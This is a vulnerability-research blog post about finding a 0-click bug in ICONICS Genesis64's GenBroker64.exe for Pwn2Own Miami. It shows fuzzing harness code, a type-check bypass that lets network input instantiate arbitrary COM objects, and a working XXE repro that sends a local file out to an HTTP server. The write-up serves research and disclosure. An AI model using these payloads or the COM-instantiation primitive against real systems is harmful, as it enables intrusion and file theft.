🧾 Introduction
After participating in Pwn2Own Austin in 2021 and failing to land my remote kernel exploit Zenith (which you can read about here), I was eager to try again. It is fun and forces me to look at things I would never have looked at otherwise. The one thing I couldn't do during my last participation in 2021 was to fly on-site and soak in the whole experience. I wanted a massive adrenaline rush on stage (as opposed to being in the comfort of your home), to hang out, to socialize and learn from the other contestants.

So when ZDI announced an in-person competition in Miami in 2022, I was stoked, but I knew nothing about Industrial Control System software (I still don't). After googling around, I realized that several of the targets ran on Windows, which is the OS I am most familiar with, so that was a big plus given the timeline. The ZDI originally announced the contest at the end of October 2021, and it was supposed to happen about three months later, in January 2022.
In this blog post, I'm hoping to walk you through my journey of participating in the contest and demonstrating a winning 0-click remote entry on stage in Miami. If you want to skip the details and go straight to the exploit code, everything is available on my GitHub repository Paracosme.
Target selection
All right, let me set the stage. It is November 2021 in Seattle; the sun sets early, it is cozy and warm inside; and I have decided to try to participate in the contest. As I mentioned in the intro, I have about three months to discover an exploitable vulnerability and write a reliable enough exploit for it. Honestly, I thought that timeline was a bit tight given that I can only invest an hour or two on average per workday (probably double that for weekends). As a result, progress will be slow, and will require discipline to put in the hours after a full day of work 🫡. And if it doesn't go anywhere, then it doesn't. Things often don't work out in life, nothing new 🤷🏽.
One thing I was excited about was to pick a target running on Windows to use my favorite debugger, WinDbg. Given the timeline, I felt good about not having to fight with gdb and/or lldb 🤢. But as I said above, I have no experience with anything related to ICS software. I don't know what it's supposed to do, where, how, when. Although I tried to educate myself as much as possible by reading all the literature I could find, I quickly realized that the infosec community didn't cover it that much.
Regarding the contest, the ZDI broke it down into four main categories with multiple targets, vectors, and cash prizes. Reading through the rules, I didn't really recognize any of the vendors, everything was very foreign to me. So, I started to look for something that checked a few boxes:
- I need to run a demo version of the software in a regular Windows VM to introspect the target easily through a debugger. I learned my lessons from my Zenith exploit where I couldn't debug my exploit on the real target. This time, I want to be able to debug the exploit on the real target to stand a chance to have it land during the contest.
- The target is written in a memory unsafe language like C or C++. It is nicer to reverse-engineer and certainly contains memory safety issues that I could use. In hindsight, it probably wasn't the best choice. Most of the other contestants exploited logic vulnerabilities which are in general: more reliable to exploit (less chance to lose the cash prize, less time spent building the exploit), and might be easier to find (more tooling opportunities?).
- Existing research/documentation/anything I can build on top of would be amazing.
After trying a few things for a week or two, I decided to target ICONICS Genesis64 in the Control Server category via the 0-click over-the-network vector. An Ethernet cable connects you to the target device, you throw your exploit against one of Genesis64's listening sockets, and you need to demonstrate code execution without any user interaction.

Luigi Auriemma published a plethora of vulnerabilities affecting the GenBroker64.exe server (which is part of Genesis64) in 2011. Many of those bugs look powerful and shallow, which gave me confidence that plenty more still exist today. At the same time, it was the only public thing I found, and it was a decade old, which is... a very long time ago.

Vulnerability research
I started the adventure a few weeks after the official announcement by downloading a demo version of the software, installing it in a VM, and starting to reverse-engineer the GenBroker64.exe service with laser focus. GenBroker64.exe is a regular Windows program available in both 32- and 64-bit versions, but it will ultimately be run on a modern 64-bit Windows 10 with the default configuration. In hindsight, I made a mistake and didn't spend enough time enumerating the available attack surfaces. Instead, I went after the same ones as Luigi when there were probably better / less explored candidates. Live and learn I guess.
I opened the file in IDA and got confused at first as IDA thought it was a .NET binary. This contradicted Luigi's findings that I had looked at previously.

I ignored it, and looked for the code that manages the listening TCP socket on port 38080. I found that entry point and it was definitely written in C++, so the binary might just be a mix of .NET & C++ 🤷🏽. Regardless, I didn't spend time trying to understand the whys, I just started to get going on the grind instead. Reverse-engineering it, function by function, understanding more and more the various structures and software abstractions. You know how this goes. Making your Hex-Rays output pretty, having ten different variables named dunno_x and all that fun stuff.
Understanding the target
After a month of daily reverse-engineering, I was moving along, and I felt like I better understood the first-order attack surfaces exposed by port 38080. It doesn't mean I understood everything going on, but I was building expertise. GenBroker64.exe appeared to be brokering conversations between a client and maybe some ICS hardware. Who knows. I had a good understanding of this layer that received custom "messages" that were made of more primitive types: strings, arrays of strings, integers, VARIANTs, etc. This layer looked like the very area Luigi attacked in 2011. I could see extra checks added here and there. I guess I was on the right track.
I was also seeing a lot of things related to the Microsoft Foundation Class (MFC) library, which I needed to familiarize myself with. Things like CArchive, ATL::CString, etc.

I started to see bugs and low-severity security issues like divisions by zero, null dereferences, infinite recursions, out-of-bounds reads, etc. Although it felt comforting for a minute, those issues were far from what I needed to pop calc remotely without user interaction. On the right track still, but no cigar. The clock was ticking, and I started to wonder if fuzzing could be helpful. The deserialization layer was suitable for fuzzing, and I could probably harness the target quickly thanks to the accumulated expertise. The wtf fuzzer I released a bit ago seemed like a good candidate, and so that's what I used. It's always a special feeling when a tool you wrote is solving one of your problems. The plan was to kick off some fuzzing quickly while I continued exploring the surface manually.
Harnessing the target
The custom messages received by GenBroker64.exe are stored in a receive buffer that looks like the following:
struct TcpRecvBuffer_t {
TcpRecvBuffer_t() { memset(this, 0, sizeof(*this)); }
uint64_t Vtbl;
uint64_t m_hFile;
uint64_t m_bCloseOnDelete;
uint64_t m_strFileName;
uint32_t m_dFoo;
uint32_t m_pTM;
uint64_t m_nGrowBytes;
uint64_t m_nPosition;
uint64_t m_nBufferSize;
uint64_t m_nFileSize;
uint64_t m_lpBuffer;
};
m_lpBuffer points to the raw bytes received off the socket, so injecting the test case in memory should be straightforward. I put together a client that sent a large packet (0x1'000 bytes long) to ensure there would be enough storage in the buffer to fuzz. I took a snapshot of GenBroker64.exe just after the relevant WSOCK32!recv call, as you can see below:
GenBroker64+0x83dd0:
00000001`40083dd0 83f8ff cmp eax,0FFFFFFFFh
kd> ub .
00000001`40083dc0 4053 push rbx
00000001`40083dc2 4883ec30 sub rsp,30h
00000001`40083dc6 488b4908 mov rcx,qword ptr [rcx+8]
00000001`40083dca ff15b8aa0200 call qword ptr [GenBroker64+0xae888 (00000001`400ae888)]
kd> dqs 00000001`400ae888
00000001`400ae888 00007ffb`f27e1010 WSOCK32!recv
kd> r @rax
rax=0000000000001000
kd> kp
# Child-SP RetAddr Call Site
00 00000000`0a48fb10 00000001`4008a9fc GenBroker64+0x83dd0
01 00000000`0a48fb50 00000001`40086783 GenBroker64+0x8a9fc
02 00000000`0a48fdf0 00000001`4008609d GenBroker64+0x86783
03 00000000`0a48fe20 00007ffc`0cd07bd4 GenBroker64+0x8609d
04 00000000`0a48ff30 00007ffc`0db0ce71 KERNEL32!BaseThreadInitThunk+0x14
05 00000000`0a48ff60 00000000`00000000 ntdll!RtlUserThreadStart+0x21
Then, I wrote a simple fuzzer module that wrote the test case at the end of the receive buffer so that out-of-bounds memory accesses trigger access violations when they hit the guard page behind it. I also updated the number of bytes returned by recv as well as the start address (m_lpBuffer). A pointer to the TcpRecvBuffer_t structure was saved on the stack. This is what the module looked like:
bool InsertTestcase(const uint8_t *Buffer, const size_t BufferSize) {
const uint64_t MaxBufferSize = 0x1'000;
if (BufferSize > MaxBufferSize) {
return true;
}
struct TcpRecvBuffer_t {
TcpRecvBuffer_t() { memset(this, 0, sizeof(*this)); }
uint64_t Vtbl;
uint64_t m_hFile;
uint64_t m_bCloseOnDelete;
uint64_t m_strFileName;
uint32_t m_dFoo;
uint32_t m_pTM;
uint64_t m_nGrowBytes;
uint64_t m_nPosition;
uint64_t m_nBufferSize;
uint64_t m_nFileSize;
uint64_t m_lpBuffer;
};
static_assert(offsetof(TcpRecvBuffer_t, m_lpBuffer) == 0x48);
//
// Calculate and read the TcpRecvBuffer_t pointer saved on the stack.
//
const Gva_t Rsp = Gva_t(g_Backend->GetReg(Registers_t::Rsp));
const Gva_t TcpRecvBufferAddr = g_Backend->VirtReadGva(Rsp + Gva_t(0x30));
//
// Read the TcpRecvBuffer_t structure.
//
TcpRecvBuffer_t TcpRecvBuffer;
if (!g_Backend->VirtReadStruct(TcpRecvBufferAddr, &TcpRecvBuffer)) {
fmt::print("VirtReadStruct failed to read the TcpRecvBuffer_t structure\n");
return false;
}
//
// Calculate the testcase address so that it is pushed towards the end of the
// page to benefit from the guard page.
//
const Gva_t BufferEnd = Gva_t(TcpRecvBuffer.m_lpBuffer + MaxBufferSize);
const Gva_t TestcaseAddr = BufferEnd - Gva_t(BufferSize);
//
// Insert testcase in memory.
//
if (!g_Backend->VirtWriteDirty(TestcaseAddr, Buffer, BufferSize)) {
fmt::print("VirtWriteDirty failed to write testcase at {}\n",
fmt::ptr(Buffer));
return false;
}
//
// Set the size of the testcase.
//
g_Backend->SetReg(Registers_t::Rax, BufferSize);
//
// Update the buffer address.
//
TcpRecvBuffer.m_lpBuffer = TestcaseAddr.U64();
if (!g_Backend->VirtWriteStructDirty(TcpRecvBufferAddr, &TcpRecvBuffer)) {
fmt::print("VirtWriteDirty failed to update the TcpRecvBuffer.m_lpBuffer "
"pointer\n");
return false;
}
return true;
}
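To make the placement trick concrete, here is a minimal sketch of the arithmetic on its own, outside of wtf. PlaceAtEnd is a hypothetical helper name (it is not part of wtf or of the module above), and the sketch assumes, like the module does, that the page right after the buffer is not accessible.

```cpp
#include <cassert>
#include <cstdint>
#include <optional>

// Hypothetical helper (not part of wtf): given a buffer of `Capacity` bytes
// starting at `BufferStart`, return the address at which a testcase of `Size`
// bytes must start so that its last byte is also the last byte of the buffer.
std::optional<uint64_t> PlaceAtEnd(uint64_t BufferStart, uint64_t Capacity,
                                   uint64_t Size) {
  // The end-of-buffer computation below must not wrap around.
  assert(BufferStart <= UINT64_MAX - Capacity);
  if (Size > Capacity) {
    // The testcase doesn't fit; the caller is expected to skip it.
    return std::nullopt;
  }
  const uint64_t BufferEnd = BufferStart + Capacity;
  return BufferEnd - Size;
}
```

With a 0x1'000-byte buffer at 0x10000, a 0x10-byte test case starts at 0x10ff0, so the first byte read past its end falls into the next page and faults right away instead of silently reading stale data.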
When harnessing a target with wtf, there are numerous events or API calls that can't execute properly inside the runtime environment. I/Os and context switches are a few examples, but there are more. Knowing how to handle those events is usually entirely target-specific. It can be as easy as nop-ing a call and as tricky as emulating the effect of a complex API. This is a tricky balancing act because you want to avoid forcing your target into acting differently than it would when executed for real. Otherwise, you risk running into bugs that only exist in the reality you built.
Thankfully, GenBroker64.exe wasn't too bad; I nop'd a few functions that led to I/Os but they didn't impact the code I was fuzzing:
bool Init(const Options_t &Opts, const CpuState_t &) {
//
// Make ExGenRandom deterministic.
//
// kd> ub fffff805`3b8287c4 l1
// nt!ExGenRandom+0xe0:
// fffff805`3b8287c0 480fc7f2 rdrand rdx
const Gva_t ExGenRandom = Gva_t(g_Dbg.GetSymbol("nt!ExGenRandom") + 0xe4);
if (!g_Backend->SetBreakpoint(ExGenRandom, [](Backend_t *Backend) {
DebugPrint("Hit ExGenRandom!\n");
Backend->Rdx(Backend->Rdrand());
})) {
return false;
}
const uint64_t GenBroker64Base = g_Dbg.GetModuleBase("GenBroker64");
const Gva_t EndFunct = Gva_t(GenBroker64Base + 0x85FCC);
if (!g_Backend->SetBreakpoint(EndFunct, [](Backend_t *Backend) {
DebugPrint("Finished!\n");
Backend->Stop(Ok_t());
})) {
return false;
}
if (!g_Backend->SetBreakpoint(
"combase!CoCreateInstance", [](Backend_t *Backend) {
DebugPrint("combase!CoCreateInstance({:#x})\n",
Backend->VirtRead8(Gva_t(Backend->Rcx())));
g_Backend->Stop(Ok_t());
})) {
return false;
}
const Gva_t DnsCacheIsKnownDns(0x1400794F0);
if (!g_Backend->SetBreakpoint(DnsCacheIsKnownDns, [](Backend_t *Backend) {
DebugPrint("DnsCacheIsKnownDns\n");
g_Backend->SimulateReturnFromFunction(0);
})) {
return false;
}
const Gva_t CMemFileGrowFile(0x14009653B);
if (!g_Backend->SetBreakpoint(CMemFileGrowFile, [](Backend_t *Backend) {
DebugPrint("CMemFile::GrowFile\n");
g_Backend->Stop(Ok_t());
})) {
return false;
}
if (!g_Backend->SetBreakpoint("KERNELBASE!Sleep", [](Backend_t *Backend) {
DebugPrint("KERNELBASE!Sleep\n");
g_Backend->Stop(Ok_t());
})) {
return false;
}
if (!g_Backend->SetBreakpoint("nt!MiIssuePageExtendRequest",
[](Backend_t *Backend) {
DebugPrint("nt!MiIssuePageExtendRequest\n");
g_Backend->Stop(Ok_t());
})) {
return false;
}
//
// Install the usermode crash detection hooks.
//
if (!SetupUsermodeCrashDetectionHooks()) {
return false;
}
return true;
}
I manually crafted a few packets to be used as a corpus, ran the fuzzer on my laptop, and finally went to bed, calling it quits for the day. I woke up the following day and was welcomed with a few findings. Exciting. It's like waking up early on Christmas morning, hoping to find gifts under the tree. Though, after looking at them, reality came back pretty fast. I realized that all the findings were some of the low-severity issues I mentioned earlier. Oh well, whatever; that's how it goes sometimes. I improved the corpus a little bit, and let the fuzzer drill through the code.
Pressure was building up as the deadline approached. I felt my progress was stalling, and it didn't feel good. I reverse-engineered myself enough times to know that I needed somewhat of a break to recharge my batteries a bit. What works best for me is to accomplish something easy, and measurable to get a supply of dopamine. I decided to get back to the fuzzer I had been running unsupervised.
Triaging findings
wtf doesn't know how to handle I/Os, and stops when a context switch occurs to prevent executing code from a different process. Combined, those behaviors mean that the fuzzer often runs into situations where an I/O leads to a context switch, which stops the test case. In general, it is a symptom of poor harnessing because the execution of your test case is interrupted before it probably should have been.
I had many of those test cases, so looking at them closely was both rewarding, and a good way to improve the fuzzing campaign. In general, this is pretty time-consuming because it highlights an area of the code you don't know much about, and you need to answer the question "how to handle it properly". Unfortunately, "debugging" test cases in wtf is basic; you have an execution trace that spans user and kernel-mode. It's usually gigabytes long so you are literally scrolling looking for a needle in a hell of a haystack.
I eventually found a very bizarre one. The execution stopped while trying to load a COM object, which triggered an I/O followed by a context switch. After looking closer, it seemed to be triggered from an area of code (I thought) I knew very well: that deserialization layer I mentioned. Another surprise was that the COM's class identifier came directly from the test case bytes... what the hell? Instantiating an arbitrary COM object? Exciting and wild, I thought. I first assumed this was a bug I had introduced when harnessing or inserting the test case in memory. I built a proof-of-concept to reproduce and debug this live.. and I indeed stepped through the code that read a class ID, and instantiated any COM object.
The code was part of mfc140u.dll, and not GenBroker64.exe, which made me feel slightly better... I didn't miss it. I did miss a code path that connected the deserialization layer to that function in mfc140u.dll. Missing something never feels great, but it is an essential part of the job. The best thing you can do is try to transform this event into a learning opportunity.
So, how did I miss this while spending so much time in this very area? The function doing the deserialization was a big switch-case statement where each case handles a specific message type. Each message is made of primitive types like strings, integers, arrays, etc. As an example, below is the function that handles the deserialization of messages with identifier 89AB:
void __fastcall PayloadReq89AB_t::ReadFromArchive(PayloadReq89AB_t *Payload, Archive_t *Archive) {
// ...
if ( (Archive->m_nMode & ArchiveReadMode) != 0 ) {
Archive::ReadUint32(Archive, Payload);
Utils::ReadVariant(&Payload->Variant1, Archive);
Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String1);
Archive::ReadUint32__(Archive, Payload->pad);
Archive::ReadUint32__(Archive, &Payload->pad[4]);
Archive::ReadUint32__(Archive, &Payload->pad[8]);
Archive::ReadUint32_(Archive, &Payload->pad[12]);
Utils::ReadVariant(&Payload->Variant2, Archive);
Utils::ReadVariant(&Payload->Variant3, Archive);
Utils::ReadVariant(&Payload->Variant4, Archive);
Utils::ReadVariant(&Payload->Variant5, Archive);
Utils::ReadVariant(&Payload->Variant6, Archive);
Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String2);
Archive::ReadUint32(Archive, &Payload->D0);
Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String3);
Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String4);
Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String5);
Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String6);
Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String7);
Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String8);
Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String9);
Archive::ReadString((CArchive *)Archive, (CString *)&Payload->StringA);
Archive::ReadUint32(Archive, &Payload->Q90);
Utils::ReadVariant(&Payload->Variant7, Archive);
Archive::ReadString((CArchive *)Archive, (CString *)&Payload->StringB);
Archive::ReadUint32(Archive, &Payload->Dunno);
}
// ...
}
One of the primitive types is a VARIANT. For those unfamiliar with this structure, it is used a lot in Windows, and is made of an integer that tells you how to interpret the data that follows. The type is an integer followed by a giant union:
typedef struct tagVARIANT {
union {
struct {
VARTYPE vt;
WORD wReserved1;
WORD wReserved2;
WORD wReserved3;
union {
LONGLONG llVal;
LONG lVal;
BYTE bVal;
SHORT iVal;
FLOAT fltVal;
DOUBLE dblVal;
VARIANT_BOOL boolVal;
VARIANT_BOOL __OBSOLETE__VARIANT_BOOL;
SCODE scode;
CY cyVal;
DATE date;
BSTR bstrVal;
IUnknown *punkVal;
IDispatch *pdispVal;
SAFEARRAY *parray;
BYTE *pbVal;
SHORT *piVal;
LONG *plVal;
LONGLONG *pllVal;
FLOAT *pfltVal;
DOUBLE *pdblVal;
VARIANT_BOOL *pboolVal;
VARIANT_BOOL *__OBSOLETE__VARIANT_PBOOL;
SCODE *pscode;
CY *pcyVal;
DATE *pdate;
BSTR *pbstrVal;
IUnknown **ppunkVal;
IDispatch **ppdispVal;
SAFEARRAY **pparray;
VARIANT *pvarVal;
PVOID byref;
CHAR cVal;
USHORT uiVal;
ULONG ulVal;
ULONGLONG ullVal;
INT intVal;
UINT uintVal;
DECIMAL *pdecVal;
CHAR *pcVal;
USHORT *puiVal;
ULONG *pulVal;
ULONGLONG *pullVal;
INT *pintVal;
UINT *puintVal;
struct {
PVOID pvRecord;
IRecordInfo *pRecInfo;
} __VARIANT_NAME_4;
} __VARIANT_NAME_3;
} __VARIANT_NAME_2;
DECIMAL decVal;
} __VARIANT_NAME_1;
} VARIANT;
Utils::ReadVariant is the name of the function that reads a VARIANT from a stream of bytes, and it roughly looked like this:
void Utils::ReadVariant(tagVARIANT *Variant, Archive_t *Archive, int Level) {
TRY {
return ReadVariant_((CArchive *)Archive, (COleVariant *)Variant);
} CATCH_ALL(e) {
VariantClear(Variant);
}
}
HRESULT Utils::ReadVariant_(tagVARIANT *Variant, Archive_t *Archive, int Level) {
VARTYPE VarType = Archive.ReadUint16();
if((VarType & VT_ARRAY) != 0) {
// Special logic to unpack arrays..
return ..;
}
Size = VariantTypeToSize(VarType);
if (Size) {
Variant->vt = VarType;
return Archive.ReadInto(&Variant->decVal.8, Size);
}
if(!CheckVariantType(VarType)) {
// ...
throw Something();
}
return Archive >> Variant; // operator>> is imported from MFC
}
The last Archive >> Variant statement in Utils::ReadVariant_ is actually what calls into the mfc140u module, and it is also the function that loads the COM object. I basically ignored it and thought it wouldn't be interesting. Code that interacts with different subsystems and/or third-party APIs is actually very important to audit for security issues. Those components might even have been written by different people or teams. They might have had different levels of scrutiny, different levels of quality, or different threat models altogether. That API might expect to receive sanitized data when you might be feeding it data arbitrarily controlled by an attacker. All of the above makes it very likely for a developer to introduce a mistake that can lead to a security issue. Anyways, tough pill to swallow.
First, ReadVariant_ reads an integer to know what the variant holds. If it is an array, then it is handled by another function. VariantTypeToSize is a tiny function that returns the number of bytes to read based on the variant's type:
size_t VariantTypeToSize(VARTYPE VarType) {
switch(VarType) {
case VT_I1: return 1;
case VT_UI2: return 2;
case VT_UI4:
case VT_INT:
case VT_UINT:
case VT_HRESULT:
return 4;
case VT_I8:
case VT_UI8:
case VT_FILETIME:
return 8;
default:
return 0;
}
}
It's important to note that it ignores anything that isn't integer-like (uint8_t, uint16_t, uint32_t, etc.) by returning zero. Otherwise, it returns the number of bytes that need to be read for the variant's content. Makes sense, right? If VariantTypeToSize returns zero, then CheckVariantType is used as sanitization to only allow certain types:
bool CheckVariantType(VARTYPE VarType) {
if((VarType & 0x2FFF) != VarType) {
return false;
}
switch(VarType & 0xFFF) {
case VT_EMPTY:
case VT_NULL:
case VT_I2:
case VT_I4:
case VT_R4:
case VT_R8:
case VT_CY:
case VT_DATE:
case VT_BSTR:
case VT_ERROR:
case VT_BOOL:
case VT_VARIANT:
case VT_I1:
case VT_UI1:
case VT_UI2:
case VT_UI4:
case VT_I8:
case VT_UI8:
case VT_INT:
case VT_UINT:
case VT_HRESULT:
case VT_FILETIME:
return true;
break;
default:
return false;
}
}
Only certain types are allowed; otherwise, Utils::ReadVariant_ throws an exception when CheckVariantType returns false. This looked solid to me.
The first trick is how the VT_EMPTY type is handled. If one is received, VariantTypeToSize returns zero and CheckVariantType returns true, which leads us right into mfc140u's operator>> function. So what though? How do we go from sending an empty variant to instantiating a COM object?
The second trick enters the room. When Utils::ReadVariant_ read the variant type, it consumed two bytes from the stream, which moved the buffer cursor forward. But MFC's operator>> also needs to know the variant type.. do you see where this is going now? To do that, it needs to read another two bytes off the stream.. which means that we are now able to send arbitrary variant types, and bypass the allow list in CheckVariantType. Pretty cool, huh?
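The two tricks combined boil down to "validate one value, act on the next one". Below is a toy simulation of that pattern, not the actual GenBroker64.exe or MFC code: Stream, Allowed, LibraryParse and ValidateThenParse are made-up names, and the allow list is reduced to VT_EMPTY to keep the sketch short.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <optional>
#include <vector>

// Values from the Windows SDK's VARENUM.
constexpr uint16_t kVtEmpty = 0;    // VT_EMPTY
constexpr uint16_t kVtUnknown = 13; // VT_UNKNOWN

// Toy stand-in for the archive: a byte buffer plus a read cursor.
struct Stream {
  std::vector<uint8_t> Bytes;
  size_t Cursor = 0;

  // Read a little-endian 16-bit integer and move the cursor forward.
  std::optional<uint16_t> ReadU16() {
    assert(Cursor <= Bytes.size());
    if (Bytes.size() - Cursor < 2) {
      return std::nullopt;
    }
    const uint16_t V = uint16_t(Bytes[Cursor] | (Bytes[Cursor + 1] << 8));
    Cursor += 2;
    return V;
  }
};

// Toy allow list standing in for CheckVariantType: only VT_EMPTY passes.
bool Allowed(uint16_t VarType) { return VarType == kVtEmpty; }

// Stand-in for the library parser: it reads the type *again* off the stream.
std::optional<uint16_t> LibraryParse(Stream &S) { return S.ReadU16(); }

// Stand-in for the validating layer: it checks one type, then hands the
// stream over without rewinding. Returns the type the library acts on.
std::optional<uint16_t> ValidateThenParse(Stream &S) {
  const auto Checked = S.ReadU16();
  if (!Checked || !Allowed(*Checked)) {
    return std::nullopt;
  }
  return LibraryParse(S);
}
```

Feeding it the bytes 00 00 0d 00 passes the check with VT_EMPTY, and the library ends up acting on VT_UNKNOWN, whereas sending 0d 00 first is rejected.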
As mentioned earlier, MFC is a library authored and shipped by Microsoft, so there's a good chance this function is documented somewhere. After googling around, I found its source code in my Visual Studio installation (C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.29.30133\atlmfc\src\mfc\olevar.cpp) and it looked like this:
CArchive& AFXAPI operator>>(CArchive& ar, COleVariant& varSrc) {
LPVARIANT pSrc = &varSrc;
ar >> pSrc->vt;
// ...
switch(pSrc->vt) {
// ...
case VT_DISPATCH:
case VT_UNKNOWN: {
LPPERSISTSTREAM pPersistStream = NULL;
CArchiveStream stm(&ar);
CLSID clsid;
ar >> clsid.Data1;
ar >> clsid.Data2;
ar >> clsid.Data3;
ar.EnsureRead(&clsid.Data4[0], sizeof clsid.Data4);
SCODE sc = CoCreateInstance(clsid, NULL,
CLSCTX_ALL | CLSCTX_REMOTE_SERVER,
pSrc->vt == VT_UNKNOWN ? IID_IUnknown : IID_IDispatch,
(void**)&pSrc->punkVal);
if(sc == E_INVALIDARG) {
sc = CoCreateInstance(clsid, NULL,
CLSCTX_ALL & ~CLSCTX_REMOTE_SERVER,
pSrc->vt == VT_UNKNOWN ? IID_IUnknown : IID_IDispatch,
(void**)&pSrc->punkVal);
}
AfxCheckError(sc);
TRY {
sc = pSrc->punkVal->QueryInterface(
IID_IPersistStream, (void**)&pPersistStream);
if(FAILED(sc)) {
sc = pSrc->punkVal->QueryInterface(
IID_IPersistStreamInit, (void**)&pPersistStream);
}
AfxCheckError(sc);
AfxCheckError(pPersistStream->Load(&stm));
} CATCH_ALL(e) {
if(pPersistStream != NULL) {
pPersistStream->Release();
}
pSrc->punkVal->Release();
THROW_LAST();
}
END_CATCH_ALL
pPersistStream->Release();
}
return ar;
}
}
A class identifier is indeed read directly from the archive, and a COM object is instantiated. Although we can instantiate any COM object, it needs to implement IID_IPersistStream or IID_IPersistStreamInit otherwise the function bails. If you are not familiar with this interface, here's what the MSDN says about it:
Enables the saving and loading of objects that use a simple serial stream for their storage needs.
You can serialize such an object with Save, send those bytes over a socket / store them on the filesystem, and recreate the object on the other side with Load. The other exciting detail is that the COM object loads itself from the stream in which we can place arbitrary content (via the socket).
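From the client's point of view, the bytes of that VARIANT could be laid out as in the sketch below. This is only the VARIANT fragment, not a full GenBroker64.exe message (the message framing isn't covered here), and it rests on two assumptions: the archive stores integers in the host's little-endian byte order, and nothing else is consumed in the elided parts of operator>>. Clsid, PutLe and BuildVariantFragment are hypothetical names.

```cpp
#include <array>
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Values from the Windows SDK's VARENUM.
constexpr uint16_t kVtEmpty = 0;    // VT_EMPTY
constexpr uint16_t kVtUnknown = 13; // VT_UNKNOWN

// Same field layout as a CLSID / GUID.
struct Clsid {
  uint32_t Data1;
  uint16_t Data2;
  uint16_t Data3;
  std::array<uint8_t, 8> Data4;
};

// Append the `Size` low bytes of `Value` in little-endian order.
void PutLe(std::vector<uint8_t> &Out, uint64_t Value, size_t Size) {
  assert(Size <= sizeof(Value));
  for (size_t Idx = 0; Idx < Size; Idx++) {
    Out.push_back(uint8_t(Value >> (8 * Idx)));
  }
}

// Hypothetical helper: serialize only the VARIANT fragment of a message.
std::vector<uint8_t> BuildVariantFragment(const Clsid &Id,
                                          const std::vector<uint8_t> &Stream) {
  std::vector<uint8_t> Out;
  PutLe(Out, kVtEmpty, 2);   // type seen by the allow list
  PutLe(Out, kVtUnknown, 2); // type seen by operator>>
  PutLe(Out, Id.Data1, 4);
  PutLe(Out, Id.Data2, 2);
  PutLe(Out, Id.Data3, 2);
  Out.insert(Out.end(), Id.Data4.begin(), Id.Data4.end());
  // Whatever follows is what the object's Load method gets to read.
  Out.insert(Out.end(), Stream.begin(), Stream.end());
  return Out;
}
```

The fragment is 20 bytes of header (two types plus the class ID) followed by the attacker-chosen stream content.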
This seemed highly insecure so I was over the moon. I knew there would be a way to exploit that behavior although I might not find a way in time. But I was convinced there had to be a way.
Exploit engineering: Building Paracosme
First, I wrote tooling to enumerate available COM objects implementing either of the interfaces on a freshly installed system, and loaded them one by one. While doing that, I ran into a couple of memory safety issues that I reported to MSRC as CVE-2022-21971 and CVE-2022-21974. It turns out RTF documents (loadable via Microsoft Word) can embed arbitrary COM class IDs that get instantiated via OleLoad. Once I had a list of candidates, I moved away from automation, and started to analyze them manually.
That search didn't yield much, to be honest, which was disappointing. The only mildly interesting thing I found is a way to exfiltrate arbitrary files via an XXE. It was really nice because it's 100% reliable. I loaded an older MSXML (Microsoft XML, 2933BF90-7B36-11D2-B20E-00C04F983E60), and sent a crafted XML document in the stream to exfiltrate an arbitrary file to a remote HTTP server. Maybe this trick is useful to somebody one day, so here is a repro:
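#include <cinttypes>
#include <cstdint>
#include <cstdio>
#include <cstdlib>
#include <optional>
#include <string>
#include <unordered_map>
#include <windows.h>
// shlwapi.h relies on types declared by windows.h, so it is included after it.
#include <shlwapi.h>
#pragma comment(lib, "ole32.lib")
#pragma comment(lib, "uuid.lib")
#pragma comment(lib, "shlwapi.lib")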
std::optional<GUID> Guid(const std::string &S) {
GUID G = {};
if (sscanf_s(S.c_str(),
"{%8" PRIx32 "-%4" PRIx16 "-%4" PRIx16 "-%2" PRIx8 "%2" PRIx8 "-"
"%2" PRIx8 "%2" PRIx8 "%2" PRIx8 "%2" PRIx8 "%2" PRIx8 "%2" PRIx8
"}",
&G.Data1, &G.Data2, &G.Data3, &G.Data4[0], &G.Data4[1],
&G.Data4[2], &G.Data4[3], &G.Data4[4], &G.Data4[5], &G.Data4[6],
&G.Data4[7]) != 11) {
return std::nullopt;
}
return G;
}
int main(int argc, char *argv[]) {
const char *Key = "{2933BF90-7B36-11D2-B20E-00C04F983E60}";
const auto &ClassId = Guid(Key);
CoInitialize(nullptr);
if (!ClassId.has_value()) {
printf("Guid failed w/ '%s'\n", Key);
return EXIT_FAILURE;
}
printf("Trying to create %s\n", Key);
IUnknown *Unknown = nullptr;
HRESULT Hr = CoCreateInstance(ClassId.value(), nullptr, CLSCTX_ALL,
IID_IUnknown, (LPVOID *)&Unknown);
if (FAILED(Hr)) {
Hr = CoCreateInstance(ClassId.value(), nullptr, CLSCTX_ALL, IID_IDispatch,
(LPVOID *)&Unknown);
}
if (FAILED(Hr)) {
printf("Failed CoCreateInstance %s\n", Key);
return EXIT_FAILURE;
}
IPersistStream *PersistStream = nullptr;
Hr = Unknown->QueryInterface(IID_IPersistStream, (LPVOID *)&PersistStream);
DWORD Return = EXIT_SUCCESS;
if (SUCCEEDED(Hr)) {
printf("SUCCESS %s!\n", Key);
// - Content of xxe.dtd:
// ```
// <!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
// <!ENTITY % root "<!ENTITY % oob SYSTEM 'http://localhost:8000/file?%payload;'>">
// %root;
// %oob;
// ```
const char S[] = R"(<?xml version="1.0"?>
<!DOCTYPE malicious [
<!ENTITY % sp SYSTEM "http://localhost:8000/xxe.dtd">
%sp;&root;
]>))";
IStream *Stream = SHCreateMemStream((const BYTE *)S, sizeof(S));
PersistStream->Load(Stream);
Stream->Release();
}
if (PersistStream) {
PersistStream->Release();
}
Unknown->Release();
return Return;
}
This is what it looks like when running it:

This felt somewhat like progress, but realistically it didn't get me closer to demonstrating remote code execution against the target. I didn't think the ZDI would accept arbitrary file exfiltration as a way to demonstrate RCE, but in retrospect I probably should have asked. I also could have looked for an interesting file to exfiltrate; something with credentials that would allow me to escalate privileges somehow. But instead, I went to the grind.
